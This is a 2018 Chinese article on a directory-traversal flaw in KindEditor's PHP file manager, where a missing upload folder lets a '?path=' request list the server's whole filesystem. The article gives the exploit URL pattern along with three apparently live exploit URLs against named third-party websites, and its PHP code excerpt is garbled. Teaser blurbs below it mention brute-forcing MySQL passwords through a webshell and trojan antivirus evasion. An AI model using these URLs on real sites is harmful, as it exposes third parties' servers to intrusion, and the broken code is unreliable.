kindeditor使用教程：Kindeditor全盘浏览的漏洞是怎么造成的？

2018-01-20 18:57:07责编：llp 来源：驱动管家人气：

因为例子很少，开始想了下不是他们的漏洞，后面想了下，后面没有检查好用户的正常配置内容导致，还是提下吧。

下载地址：

貌似是最新版本的。

测试语言：PHP

测试漏洞文件：/kindeditor/php/file_manager_json.php

默认配置(第16行)：

$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时，如网上的一个例子：

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录，所以就造成了漏洞。

怎么造成了漏洞的呢？我们分析下。

PHP Code复制内容到剪贴板

2);//文件夹是否包含文件 $file_list[$i]['filesize']=0;//文件大小 $file_list[$i]['is_photo']=false;//是否图片 $file_list[$i]['filetype']='';//文件类别，用扩展名判断 }else{ $file_list[$i]['is_dir']=false; $file_list[$i]['has_file']=false; $file_list[$i]['filesize']=filesize($file); $file_list[$i]['dir_path']=''; $file_ext=strtolower(pathinfo($file,PATHINFO_EXTENSION)); $file_list[$i]['is_photo']=in_array($file_ext,$ext_arr); $file_list[$i]['filetype']=$file_ext; } $file_list[$i]['filename']=$filename;//文件名，包含扩展名 $file_list[$i]['datetime']=date('Y-m-dH:i:s',filemtime($file));//文件最后修改时间 $i++; } closedir($handle); } //排序 functioncmp_func($a,$b){ global$order; if($a['is_dir']&&!$b['is_dir']){ return-1; }elseif(!$a['is_dir']&&$b['is_dir']){ return1; }else{ if($order=='size'){ if($a['filesize']>$b['filesize']){ return1; }elseif($a['filesize']<$b['filesize']){ order="='type'){" result="array();" url="" charset="UTF-8');" json="newServices_JSON();" json-="">encode($result);

第三十八行：

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后，不存在的目录会返回空，然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后，而且$_GET['path']要以'/'为结尾(有验证)，所以，我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的（互联网找到几个）：

先给本地的(attached文件夹被我删了)：

kindeditor使用教程：Kindeditor的全盘浏览的漏洞是怎么造成的？

互联网找到的：

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

kindeditor使用教程：Kindeditor的全盘浏览的漏洞是怎么造成的？

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/

kindeditor使用教程：Kindeditor的全盘浏览的漏洞是怎么造成的？

http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

kindeditor使用教程：Kindeditor的全盘浏览的漏洞是怎么造成的？

修复方案：再验证下绝对路径？

简单谈谈哪些类型的网络管理员具有不安全因素？
Jeff Dray最近经过对IT行业的深入调查研究，通过总结和分析针对IT行业列出了一份类别名单。在这里，他定义了七类最不安全的网络管理员。如果你是一名网络管理员，并且已经意识到工作中还存在着不足，看看你属于
详情2018-01-15 16:49:50责编：llp 来源：驱动管家
验证码的生成原理及其破解方法
所谓验证码，就是将一串随机产生的数字或符号，生成一幅图片，图片里加上一些干扰象素（防止OCR），由用户肉眼识别其中的验证码信息，输入表单提交网站验证，验证成功后才能使用某项功能。不少网站为了防止用户
详情2018-01-16 16:39:17责编：llp 来源：驱动管家
这里有暴力破解php mysql密码的步骤
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码，因为是破解本机，所以速度奇快无比，貌似还有点效果，这个以前有人发过，这个是我改过的。已知有一处Bug，不清楚为何，密码数量少的时候，准确
详情2018-01-14 21:18:45责编：llp 来源：驱动管家
内网安全管理应对企业内网安全挑战的10种策略
几乎所有企业对于网络安全的重视程度一下子提高了，纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而，Intranet内部的攻击和入侵却依然猖狂。事实证明，公司内部的不安全因素远比外部的危害更恐怖。
详情2018-01-19 17:54:32责编：llp 来源：驱动管家
adobe flash player swf文件被修改出现漏洞怎么办？
受影响系统： Adobe Flash Player < 9 0 115 0 不受影响系统： Adobe Flash Player 9 0 124 0 描述： Flash Player是一款非常流行的FLASH播放器。 Flash player在试图访问没有正确实例化的嵌入Actionscript对象时存在堆溢出漏洞，如果攻击者恶意
详情2018-01-13 19:26:46责编：llp 来源：驱动管家
密码忘了怎么办？常见的计算机网络密码破解方法介绍
我们知道，为了有效维护用户的使用权，进入电脑、上Internet、保护文档等，都要用到不同的账号或密码口令，可以说这些密码就是使用电脑的“通行证”。如果万一忘记或弄混了哪个密码，机器是不认人的，没准儿会误
详情2018-01-17 17:31:14责编：llp 来源：驱动管家
木马免杀有哪些绝招？木马免杀的五大绝招
常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP　然后保存就可以躲过瑞　星的表面查杀。绝招二：快速定位
详情2018-01-07 09:11:57责编：llp 来源：驱动管家
mcafee企业版阻止入侵者创建删除用户和修改密码？
利用McAfee策略让入侵者无法创建用户+无法删除用户+无法改密码的设置方法，强烈建议win2003使用mcafee杀毒软件，其它的都不如这个好。让入侵者无法创建用户+无法删除用户+无法改密码1、打开控制台-访问保护-用户
详情2018-01-20 14:46:49责编：llp 来源：驱动管家
谈谈csrf的攻击原理什么是csrf？
CSRF攻击原理解析Author: rayh4c [80sec]EMail: rayh4c 80sec comSite: http: www 80sec comDate: 2008-9-210×00 前言在Web程序中普通用户一般只在Web界面里完成他想要的操作，Web程序接受的正常客户端请
详情2018-01-18 13:30:58责编：llp 来源：驱动管家
电脑文件夹加密怎么做？硬件文件夹加密好还是软件文件夹加密好？
现在，在公司上班族中，由于每天都会形成很多工作文件，一些文件还涉及到单位的无形资产和商业机密，如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密，则通常有两种方法：软件加密
详情2018-01-07 08:28:05责编：llp 来源：驱动管家